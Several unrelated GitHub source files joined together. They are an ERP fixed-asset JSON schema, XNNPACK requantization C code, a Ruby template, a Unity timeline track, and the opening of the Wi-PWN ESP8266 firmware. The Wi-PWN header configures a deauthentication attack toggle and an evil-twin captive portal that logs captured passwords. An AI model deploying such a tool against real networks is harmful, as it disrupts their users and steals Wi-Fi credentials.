"name": "AssetGroup",
"dataType": "AssetGroupId",
"isNullable": true,
"description": ""
},
{
"name": "AssetGroupDepreciation_IN",
"dataType": "AssetGroupDepreciation_IN",
"isNullable": true,
"description": ""
},
{
"name": "AssetId",
"dataType": "AssetId",
"description": ""
},
{
"name": "AssetPurchaseDate_PL",
"dataType": "PlAssetPurchaseDate",
"isNullable": true,
"description": ""
},
{
"name": "AssetRevisedAcquisitionCost_JP",
"dataType": "AssetRevisedAcquisitionCost_JP",
"isNullable": true,
"description": ""
},
{
"name": "AssetRevisedAcquisitionCostStartDate_JP",
"dataType": "AssetTransDate",
"isNullable": true,
"description": ""
},
{
"name": "BookId",
"dataType": "AssetBookId",
"description": ""
},
{
"name": "CategorizationDate_CZ",
"dataType": "CzAssetCategorizationDate",
"isNullable": true,
"description": ""
},
{
"name": "CheckMaxPercentRB",
"dataType": "AssetCheckMaxPercentRB_DE",
"isNullable": true,
"displayName": "Check maximum percent",
"description": ""
},
{
"name": "ConsumptionFactorId",
"dataType": "AssetConsumptionFactorId",
"isNullable": true,
"description": ""
},
{
"name": "ConsumptionQtyEstimated",
"dataType": "AssetConsumptionQtyEstimated",
"isNullable": true,
"description": ""
},
{
"name": "ConsumptionUnitId",
"dataType": "AssetConsumptionUnitId",
"isNullable": true,
"description": ""
},
{
"name": "CustAccount",
"dataType": "CustAccount",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "CustInvoiceId",
"dataType": "CustInvoiceId",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "DefaultDimension",
"dataType": "LedgerDefaultDimensionValueSet",
"isNullable": true,
"description": ""
},
{
"name": "Depreciation",
"dataType": "AssetDepreciate",
"isNullable": true,
"description": ""
},
{
"name": "DepreciationAmountUnit",
"dataType": "AssetDepreciationAmountUnit",
"isNullable": true,
"description": ""
},
{
"name": "DepreciationConvention",
"dataType": "integer",
"isNullable": true,
"description": ""
},
{
"name": "DepreciationGroupId_W",
"dataType": "AssetDepreciationGroupId_W",
"isNullable": true,
"description": ""
},
{
"name": "DepreciationStartDate",
"dataType": "AssetDepreciationStartDate",
"isNullable": true,
"description": ""
},
{
"name": "DeprPrevPeriods_PL",
"dataType": "AssetAmount",
"isNullable": true,
"displayName": "Depreciation amount before registration",
"description": ""
},
{
"name": "DeprPrevPeriodsNonCost_PL",
"dataType": "AssetAmount",
"isNullable": true,
"displayName": "Non-cost depreciation amount before registration",
"description": ""
},
{
"name": "DeprPrevPriorCost_PL",
"dataType": "AssetAmount",
"isNullable": true,
"displayName": "Depreciation amount before registration (prior years)",
"description": ""
},
{
"name": "DeprPrevPriorNonCost_PL",
"dataType": "AssetAmount",
"isNullable": true,
"displayName": "Non-cost depreciation amount before registration (prior years)",
"description": ""
},
{
"name": "DisposalDate",
"dataType": "AssetDisposalDate",
"isNullable": true,
"description": ""
},
{
"name": "DueFrom_PSN",
"dataType": "RefRecId",
"isNullable": true,
"displayName": "Transfer from account",
"description": ""
},
{
"name": "DueTo_PSN",
"dataType": "RefRecId",
"isNullable": true,
"displayName": "Transfer to account",
"description": ""
},
{
"name": "EquallyDividedStartDate_JP",
"dataType": "AssetDepYearsEquallyDividedStartDate_JP",
"isNullable": true,
"description": ""
},
{
"name": "ExceedingNetBookValue",
"dataType": "ExceedingNetBookValue",
"isNullable": true,
"description": ""
},
{
"name": "IsDerogatoryBook_FR",
"dataType": "AssetDerogatoryBook_FR",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "IsDisposalSameYear",
"dataType": "FixedAssetDisposalSameYear",
"isNullable": true,
"description": ""
},
{
"name": "IsShorteningUsefulLife_JP",
"dataType": "AssetIsShorteningUsefulLife_JP",
"isNullable": true,
"description": ""
},
{
"name": "IsTrueUpDepreciation",
"dataType": "FixedAssetTrueUpDepreciation",
"isNullable": true,
"description": ""
},
{
"name": "LastDepreciationDate",
"dataType": "AssetLastDepreciationDate",
"isNullable": true,
"description": ""
},
{
"name": "LastDepreciationDateAccelerated_JP",
"dataType": "AssetLastDepreciationDate",
"isNullable": true,
"description": ""
},
{
"name": "LastDepreciationDateExtraOrd",
"dataType": "AssetLastDepreciationDate",
"isNullable": true,
"description": ""
},
{
"name": "LastReserveAllocationDate_JP",
"dataType": "TransDate",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "LifeTime",
"dataType": "AssetLifeTime",
"isNullable": true,
"description": ""
},
{
"name": "LifeTimeRest",
"dataType": "AssetLifeTimeRest",
"isNullable": true,
"description": ""
},
{
"name": "LVPTransferDate_AU",
"dataType": "AssetLowValuePoolTransferDate_AU",
"isNullable": true,
"description": ""
},
{
"name": "LVPTransferId_AU",
"dataType": "AssetLowValuePoolTransferId_AU",
"isNullable": true,
"description": ""
},
{
"name": "MaxPercentRB",
"dataType": "AssetMaxPercentRB_DE",
"isNullable": true,
"displayName": "Percentage after validation",
"description": ""
},
{
"name": "NegativeNetBookValue",
"dataType": "NegativeNetBookValue",
"isNullable": true,
"description": ""
},
{
"name": "OrigAcquisitionDate_IN",
"dataType": "AssetAcquisitionDate",
"isNullable": true,
"description": ""
},
{
"name": "Percentage_PL",
"dataType": "Percent",
"isNullable": true,
"displayName": "Percentage",
"description": ""
},
{
"name": "PercentageAlt_PL",
"dataType": "Percent",
"isNullable": true,
"description": ""
},
{
"name": "PercentageExt_PL",
"dataType": "Percent",
"isNullable": true,
"description": ""
},
{
"name": "PostingProfile",
"dataType": "AssetPostingProfile",
"isNullable": true,
"description": ""
},
{
"name": "PurchId",
"dataType": "PurchId",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "RBSLFactor",
"dataType": "AssetRBSLFactor",
"isNullable": true,
"description": ""
},
{
"name": "ReplacementDate",
"dataType": "AssetReplacementDate",
"isNullable": true,
"description": ""
},
{
"name": "ReserveTypeId",
"dataType": "AssetReserveTypeId",
"isNullable": true,
"description": ""
},
{
"name": "RevaluationGroupId",
"dataType": "AssetRevaluationGroupId",
"isNullable": true,
"description": ""
},
{
"name": "SaleValue",
"dataType": "AssetSaleValue",
"isNullable": true,
"description": ""
},
{
"name": "ScrapValue",
"dataType": "AssetScrapValue",
"isNullable": true,
"description": ""
},
{
"name": "ServiceLife",
"dataType": "AssetServiceLife",
"isNullable": true,
"description": ""
},
{
"name": "ServiceLifeMonths_FR",
"dataType": "AssetServiceLifeMonths",
"isNullable": true,
"description": ""
},
{
"name": "ServiceLifeYears_FR",
"dataType": "AssetServiceLifeYears",
"isNullable": true,
"description": ""
},
{
"name": "SortingId",
"dataType": "AssetSortingId",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "SortingId2",
"dataType": "AssetSortingId2",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "SortingId3",
"dataType": "AssetSortingId3",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "SpecialDepAllocationConvention_JP",
"dataType": "integer",
"isNullable": true,
"description": ""
},
{
"name": "SpecialDepAllocationPeriods_JP",
"dataType": "AssetSpecialDepAllocationPeriods_JP",
"isNullable": true,
"description": ""
},
{
"name": "SpecialDepAllocationUnit_JP",
"dataType": "AssetSpecialDepAllocationUnit_JP",
"isNullable": true,
"description": ""
},
{
"name": "SpecialDepLastAllocationDate_JP",
"dataType": "AssetSpecialDepLastAllocationDate_JP",
"isNullable": true,
"description": ""
},
{
"name": "SpecialDepStartDate_JP",
"dataType": "AssetSpecialDepStartDate_JP",
"isNullable": true,
"description": ""
},
{
"name": "Status",
"dataType": "integer",
"isNullable": true,
"description": ""
},
{
"name": "SummarizeByMajorType_JP",
"dataType": "AssetSummarizeByMajorType_JP",
"isNullable": true,
"description": ""
},
{
"name": "UsedFromDate",
"dataType": "AssetUsedFromDate",
"isNullable": true,
"description": ""
},
{
"name": "VendAccount",
"dataType": "VendAccount",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "VendInvoiceId",
"dataType": "VendInvoiceId",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "DepreciationProfile",
"dataType": "AssetDepreciationProfileId",
"isNullable": true,
"description": ""
},
{
"name": "DepreciationAltProfile",
"dataType": "AssetDepreciationAltProfileId",
"isNullable": true,
"description": ""
},
{
"name": "DepreciationExtProfile",
"dataType": "AssetDepreciationExtProfileId",
"isNullable": true,
"description": ""
},
{
"name": "DepreciationAcceleratedProfile_JP",
"dataType": "AssetDepreciationAcceleratedProfileId_JP",
"isNullable": true,
"description": ""
},
{
"name": "InventTransId_RU",
"dataType": "InventTransId",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "CurrencyCode_RU",
"dataType": "CurrencyCode",
"isNullable": true,
"description": ""
},
{
"name": "SubGroupId_RU",
"dataType": "RAssetSubGroupId",
"isNullable": true,
"description": ""
},
{
"name": "Lock_RU",
"dataType": "AssetLock_RU",
"isNullable": true,
"description": ""
},
{
"name": "NumberSequenceGroupId_RU",
"dataType": "NumberSequenceGroupId",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "PurchInternalInvoiceId_RU",
"dataType": "PurchInternalInvoiceId",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "SalesId_RU",
"dataType": "SalesId",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "DepreciationExtProfile_JP",
"dataType": "AssetDepreciationExtProfileId",
"isNullable": true,
"description": ""
},
{
"name": "AcquisitionPriceReportingCurrency",
"dataType": "AssetAcquisitionPriceReportingCurrency",
"isNullable": true,
"description": ""
},
{
"name": "ScrapValueReportingCurrency",
"dataType": "AssetScrapValueReportingCurrency",
"isNullable": true,
"description": ""
},
{
"name": "DepreciationAmountUnitReportingCurrency",
"dataType": "AssetDepreciationAmountUnitReportingCurrency",
"isNullable": true,
"description": ""
},
{
"name": "DataAreaId",
"dataType": "string",
"isReadOnly": true
},
{
"entity": {
"entityReference": "AssetAcquisitionMethod"
},
"name": "Relationship_AssetAcquisitionMethodRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetBookTable"
},
"name": "Relationship_AssetBookTableRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetChangesHistory"
},
"name": "Relationship_AssetChangesHistoryRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetConsumptionFactor"
},
"name": "Relationship_AssetConsumptionFactorRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetConsumptionUnit"
},
"name": "Relationship_AssetConsumptionUnitRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetGroup"
},
"name": "Relationship_AssetGroup_AssetRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetLedger"
},
"name": "Relationship_AssetLedgerRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetReserveType"
},
"name": "Relationship_AssetReserveTypeRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetRevaluationGroup"
},
"name": "Relationship_AssetRevaluationGroupRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetSorting"
},
"name": "Relationship_AssetSorting_SortingIdRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetSorting"
},
"name": "Relationship_AssetSorting_SortingId2Relationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetSorting"
},
"name": "Relationship_AssetSorting_SortingId3Relationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetTable"
},
"name": "Relationship_AssetTable_AssertIdRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetTable"
},
"name": "Relationship_AssetTable_LVPTransferIdRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetTrans"
},
"name": "Relationship_assettransRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "CustInvoiceJour"
},
"name": "Relationship_CustInvoiceRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "CustTable"
},
"name": "Relationship_CustTableRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "DimensionAttributeValueSet"
},
"name": "Relationship_DefaultDimensionRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetDepreciationGroup_W"
},
"name": "Relationship_DepreciationGroupRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "MainAccount"
},
"name": "Relationship_DueFrom_PSNRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "MainAccount"
},
"name": "Relationship_DueTo_PSNRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "PurchTable"
},
"name": "Relationship_PurchTableRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "VendTable"
},
"name": "Relationship_VendTableRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetDepreciationProfile"
},
"name": "Relationship_DepreciationProfileRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetDepreciationProfile"
},
"name": "Relationship_DepreciationAltProfileRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetDepreciationProfile"
},
"name": "Relationship_DepreciationExtProfileRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "AssetDepreciationProfile"
},
"name": "Relationship_DepreciationAcceleratedProfile_JPRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "InventTransOrigin"
},
"name": "Relationship_InventTransOrigin_RURelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "Currency"
},
"name": "Relationship_Currency_RURelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "RAssetSubGroup"
},
"name": "Relationship_RAssetSubGroup_RURelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "NumberSequenceGroup"
},
"name": "Relationship_NumberSequenceGroup_RURelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "SalesTable"
},
"name": "Relationship_SalesTableRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
},
{
"entity": {
"entityReference": "CompanyInfo"
},
"name": "Relationship_CompanyRelationship",
"resolutionGuidance": {
"entityByReference": {
"allowReference": true
}
}
}
],
"displayName": "Fixed asset book"
},
{
"dataTypeName": "AssetAcquisitionDate",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetAcquisitionMethodId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetAcquisitionPrice",
"extendsDataType": "decimal"
},
{
"dataTypeName": "TransDate",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetDerogatoryValueModel_FR",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetFairValue",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetGroupId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetGroupDepreciation_IN",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetId",
"extendsDataType": "string"
},
{
"dataTypeName": "PlAssetPurchaseDate",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetRevisedAcquisitionCost_JP",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetTransDate",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetBookId",
"extendsDataType": "string"
},
{
"dataTypeName": "CzAssetCategorizationDate",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetCheckMaxPercentRB_DE",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetConsumptionFactorId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetConsumptionQtyEstimated",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetConsumptionUnitId",
"extendsDataType": "string"
},
{
"dataTypeName": "CustAccount",
"extendsDataType": "string"
},
{
"dataTypeName": "CustInvoiceId",
"extendsDataType": "string"
},
{
"dataTypeName": "LedgerDefaultDimensionValueSet",
"extendsDataType": "bigInteger"
},
{
"dataTypeName": "AssetDepreciate",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetDepreciationAmountUnit",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetDepreciationGroupId_W",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetDepreciationStartDate",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetAmount",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetDisposalDate",
"extendsDataType": "date"
},
{
"dataTypeName": "RefRecId",
"extendsDataType": "bigInteger"
},
{
"dataTypeName": "AssetDepYearsEquallyDividedStartDate_JP",
"extendsDataType": "date"
},
{
"dataTypeName": "ExceedingNetBookValue",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetDerogatoryBook_FR",
"extendsDataType": "integer"
},
{
"dataTypeName": "FixedAssetDisposalSameYear",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetIsShorteningUsefulLife_JP",
"extendsDataType": "integer"
},
{
"dataTypeName": "FixedAssetTrueUpDepreciation",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetLastDepreciationDate",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetLifeTime",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetLifeTimeRest",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetLowValuePoolTransferDate_AU",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetLowValuePoolTransferId_AU",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetMaxPercentRB_DE",
"extendsDataType": "decimal"
},
{
"dataTypeName": "NegativeNetBookValue",
"extendsDataType": "integer"
},
{
"dataTypeName": "Percent",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetPostingProfile",
"extendsDataType": "string"
},
{
"dataTypeName": "PurchId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetRBSLFactor",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetReplacementDate",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetReserveTypeId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetRevaluationGroupId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetSaleValue",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetScrapValue",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetServiceLife",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetServiceLifeMonths",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetServiceLifeYears",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetSortingId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetSortingId2",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetSortingId3",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetSpecialDepAllocationPeriods_JP",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetSpecialDepAllocationUnit_JP",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetSpecialDepLastAllocationDate_JP",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetSpecialDepStartDate_JP",
"extendsDataType": "date"
},
{
"dataTypeName": "AssetSummarizeByMajorType_JP",
"extendsDataType": "integer"
},
{
"dataTypeName": "AssetUsedFromDate",
"extendsDataType": "date"
},
{
"dataTypeName": "VendAccount",
"extendsDataType": "string"
},
{
"dataTypeName": "VendInvoiceId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetDepreciationProfileId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetDepreciationAltProfileId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetDepreciationExtProfileId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetDepreciationAcceleratedProfileId_JP",
"extendsDataType": "string"
},
{
"dataTypeName": "InventTransId",
"extendsDataType": "string"
},
{
"dataTypeName": "CurrencyCode",
"extendsDataType": "string"
},
{
"dataTypeName": "RAssetSubGroupId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetLock_RU",
"extendsDataType": "integer"
},
{
"dataTypeName": "NumberSequenceGroupId",
"extendsDataType": "string"
},
{
"dataTypeName": "PurchInternalInvoiceId",
"extendsDataType": "string"
},
{
"dataTypeName": "SalesId",
"extendsDataType": "string"
},
{
"dataTypeName": "AssetAcquisitionPriceReportingCurrency",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetScrapValueReportingCurrency",
"extendsDataType": "decimal"
},
{
"dataTypeName": "AssetDepreciationAmountUnitReportingCurrency",
"extendsDataType": "decimal"
}
]
} | {
"pile_set_name": "Github"
} |
// Copyright (c) Facebook, Inc. and its affiliates.
// All rights reserved.
//
// Copyright 2019 Google LLC
//
// This source code is licensed under the BSD-style license found in the
// LICENSE file in the root directory of this source tree.
#include <assert.h>
#include <stdint.h>
#include <stddef.h>
#include <fp16/bitcasts.h>
#include <xnnpack/scalar-utils.h>
#include <xnnpack/requantization-stubs.h>
void xnn_qs8_requantize_precise__scalar_unsigned64(
size_t n,
const int32_t* input,
float scale,
int8_t zero_point,
int8_t qmin,
int8_t qmax,
int8_t* output)
{
assert(n % 4 == 0);
assert(scale < 1.0f);
assert(scale >= 0x1.0p-32f);
const uint32_t scale_bits = fp32_to_bits(scale);
const uint32_t multiplier = (scale_bits & UINT32_C(0x007FFFFF)) | UINT32_C(0x00800000);
const uint32_t shift = 127 + 23 - (scale_bits >> 23);
assert(shift >= 24);
assert(shift < 56);
const uint64_t rounding = UINT64_C(1) << (shift - 1);
const int32_t smin = (int32_t) qmin - (int32_t) zero_point;
const int32_t smax = (int32_t) qmax - (int32_t) zero_point;
for (; n != 0; n -= 4) {
const int32_t x = input[0];
const int32_t y = input[1];
const int32_t z = input[2];
const int32_t w = input[3];
input += 4;
// Compute absolute value of input as unsigned 32-bit int.
// All further computations will work with unsigned values to avoid undefined behaviour on signed operations.
const uint32_t x_abs = (x >= 0) ? (uint32_t) x : -(uint32_t) x;
const uint32_t y_abs = (y >= 0) ? (uint32_t) y : -(uint32_t) y;
const uint32_t z_abs = (z >= 0) ? (uint32_t) z : -(uint32_t) z;
const uint32_t w_abs = (w >= 0) ? (uint32_t) w : -(uint32_t) w;
// Compute full 64-bit product of 32-bit factors.
const uint64_t x_product = (uint64_t) x_abs * (uint64_t) multiplier;
const uint64_t y_product = (uint64_t) y_abs * (uint64_t) multiplier;
const uint64_t z_product = (uint64_t) z_abs * (uint64_t) multiplier;
const uint64_t w_product = (uint64_t) w_abs * (uint64_t) multiplier;
// Shift the full 64-bit product right with rounding.
// Rounding is performed towards closest integer, with midpoints rounded up (same as away from zero).
//
// Note that although rounding is precomputed, it is dependent on shift value, and on processors with 64-bit
// "right shift with rounding" instruction each line below can be represented by just one such instruction
// (e.g. VRSHL.U64 on ARM NEON, URSHL in ARM64 Advanced SIMD).
const uint32_t x_abs_scaled = (uint32_t) ((x_product + rounding) >> shift);
const uint32_t y_abs_scaled = (uint32_t) ((y_product + rounding) >> shift);
const uint32_t z_abs_scaled = (uint32_t) ((z_product + rounding) >> shift);
const uint32_t w_abs_scaled = (uint32_t) ((w_product + rounding) >> shift);
// Copy the sign of input to scaled absolute input value.
//
// On x86 processors with SSSE3 instruction set, this operation nicely maps to PSIGND instruction.
const int32_t x_scaled = (int32_t) (x >= 0 ? x_abs_scaled : -x_abs_scaled);
const int32_t y_scaled = (int32_t) (y >= 0 ? y_abs_scaled : -y_abs_scaled);
const int32_t z_scaled = (int32_t) (z >= 0 ? z_abs_scaled : -z_abs_scaled);
const int32_t w_scaled = (int32_t) (w >= 0 ? w_abs_scaled : -w_abs_scaled);
// Clamp scaled value with zero point between (qmin - zero point) and (qmax - zero point).
const int32_t x_clamped = x_scaled < smin ? smin : x_scaled > smax ? smax : x_scaled;
const int32_t y_clamped = y_scaled < smin ? smin : y_scaled > smax ? smax : y_scaled;
const int32_t z_clamped = z_scaled < smin ? smin : z_scaled > smax ? smax : z_scaled;
const int32_t w_clamped = w_scaled < smin ? smin : w_scaled > smax ? smax : w_scaled;
// Add zero point to clamped value.
// The result is guaranteed to be in [qmin, qmax] range.
//
// This addition can not be safely done before clamping, because scaled values are in [-2147483520, 2147483519]
// range, so addition of zero point (which can be up to 255) can overflow signed 32-bit integer.
const int32_t x_biased = x_clamped + zero_point;
const int32_t y_biased = y_clamped + zero_point;
const int32_t z_biased = z_clamped + zero_point;
const int32_t w_biased = w_clamped + zero_point;
output[0] = (int8_t) x_biased;
output[1] = (int8_t) y_biased;
output[2] = (int8_t) z_biased;
output[3] = (int8_t) w_biased;
output += 4;
}
}
| {
"pile_set_name": "Github"
} |
attribute :id
attribute :public_address
attribute :created_at
attribute :balance
child(:issue) {
attribute :id
attribute :title
attribute :to_param => :slug
} | {
"pile_set_name": "Github"
} |
using UnityEngine;
using UnityEngine.Playables;
using UnityEngine.Timeline;
using UnityEngine.Experimental.VFX;
[TrackColor(0.5990566f, 0.9038978f, 1f)]
[TrackClipType(typeof(VisualEffectActivationClip))]
[TrackBindingType(typeof(VisualEffect))]
public class VisualEffectActivationTrack : TrackAsset
{
public override Playable CreateTrackMixer(PlayableGraph graph, GameObject go, int inputCount)
{
return ScriptPlayable<VisualEffectActivationMixerBehaviour>.Create(graph, inputCount);
}
}
| {
"pile_set_name": "Github"
} |
/*
(*********************************************************************
* ____ ____ _ _______ ____ ____ ____ _____ *
* |_ _| |_ _|(_) |_ __ \|_ _| |_ _||_ \|_ _| *
* \ \ /\ / / __ ______ | |__) | \ \ /\ / / | \ | | *
* \ \/ \/ / [ ||______|| ___/ \ \/ \/ / | |\ \| | *
* \ /\ / | | _| |_ \ /\ / _| |_\ |_ *
* \/ \/ [___] |_____| \/ \/ |_____|\____| *
* *
***********************************************************************
* https://github.com/samdenty99/Wi-PWN *
* *
* (c) 2017 Sam Denty *
* https://samdd.me/projects *
* *
*---------------------------------------------------------------------*
* Wi-PWN is based on spacehuhn/esp8266_deauther *
* (c) Stefan Kremser *
**********************************************************************
*/
// Including some libraries we need //
#include <Arduino.h>
#include <ESP8266WiFi.h>
#include <ESP8266WebServer.h>
#include <FS.h>
#include <ESP8266HTTPUpdateServer.h>
#include <WiFiClient.h>
// Settings //
//#define USE_DISPLAY /* <-- uncomment that if you want to use the display */
#define GPIO0_DEAUTH_BUTTON /* <-- Enable using GPIO0 (Flash button on NodeMCUs) as a deauth attack toggle (CAN LEAD TO LED BLINKING BUG!)*/
#define resetPin 4 /* <-- comment out or change if you need GPIO 4 for other purposes */
//#define USE_LED16 /* <-- for the Pocket ESP8266 which has a LED on GPIO 16 to indicate if it's running */
//#define USE_CAPTIVE_PORTAL /* <-- enable captive portal (redirects all pages to 192.168.4.1), Wi-PWN page is available on /wipwn, passwords are accessed using /wipwn.log */
// Evil Twin with Captive Portal //
#ifdef USE_CAPTIVE_PORTAL
#include "./DNSServer.h" // Patched lib
#endif
// Including everything for the OLED //
#ifdef USE_DISPLAY
#include <Wire.h>
//include the library you need
#include "SSD1306.h"
#include "SH1106.h"
//create display(Adr, SDA-pin, SCL-pin)
SSD1306 display(0x3c, 5, 4); //GPIO 5 = D1, GPIO 4 = D2
//SH1106 display(0x3c, 5, 4);
//button pins
#define upBtn 12 //GPIO 12 = D6
#define downBtn 13 //GPIO 13 = D7
#define selectBtn 14 //GPIO 14 = D5
#define displayBtn 0 //GPIO 0 = FLASH BUTTON
//render settings
#define fontSize 8
#define rowsPerSite 8
int rows = 4;
int curRow = 0;
int sites = 1;
int curSite = 1;
int lrow = 0;
int menu = 0; //0 = Main Menu, 1 = APs, 2 = Stations, 3 = Attacks, 4 = Monitor
bool canBtnPress = true;
int buttonPressed = 0; //0 = UP, 1 = DOWN, 2 = SELECT, 3 = DISPLAY
bool displayOn = true;
#endif
// More Includes! //
extern "C" {
#include "user_interface.h"
}
#ifdef USE_CAPTIVE_PORTAL
const byte DNS_PORT = 53; // Capture DNS requests on port 53
IPAddress apIP(192, 168, 4, 1); // IP Address for Wi-PWN (Changing this will cause unwanted side effects - app malfunctioning)
DNSServer dnsServer; // Create the DNS object
#endif
ESP8266WebServer server(80); // HTTP server
ESP8266HTTPUpdateServer httpUpdater; // OTA Update server
#include <EEPROM.h>
#include "data.h"
#include "NameList.h"
#include "APScan.h"
#include "ClientScan.h"
#include "Attack.h"
#include "Settings.h"
#include "SSIDList.h"
/* ========== DEBUG ========== */
const bool debug = true;
/* ========== DEBUG ========== */
// Run-Time Variables //
String wifiMode = "";
String attackMode_deauth = "";
String attackMode_beacon = "";
String scanMode = "SCAN";
// Deauth detector
bool detecting = false;
unsigned long dC = 0;
unsigned long prevTime = 0;
unsigned long curTime = 0;
int curChannel = settings.detectorChannel;
NameList nameList;
APScan apScan;
ClientScan clientScan;
